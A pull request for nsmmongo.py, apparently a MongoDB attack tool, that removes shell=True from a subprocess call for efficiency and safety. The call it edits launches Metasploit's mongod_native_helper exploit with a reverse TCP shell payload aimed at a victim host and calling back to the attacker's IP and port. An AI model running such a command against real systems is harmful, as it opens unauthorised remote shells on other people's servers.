### PR TITLE
Avoid shell=True in subprocess.call()

### DIFF
--- a/nsmmongo.py
+++ b/nsmmongo.py
@@ -338,7 +338,7 @@ def enumDbs (mongoConn):
 
 def msfLaunch():
     try:
-        proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(victim) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(myIP) + " LPORT="+ str(myPort) + " E", shell=True)
+        proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"])
 
     except:
         print "Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined."


### PR DESCRIPTION
The code doesn't need the shell for anything so this should be more efficient, as well as potentially more secure, and hopefully instructive for readers of the code.

See also https://stackoverflow.com/questions/3172470/actual-meaning-of-shell-true-in-subprocess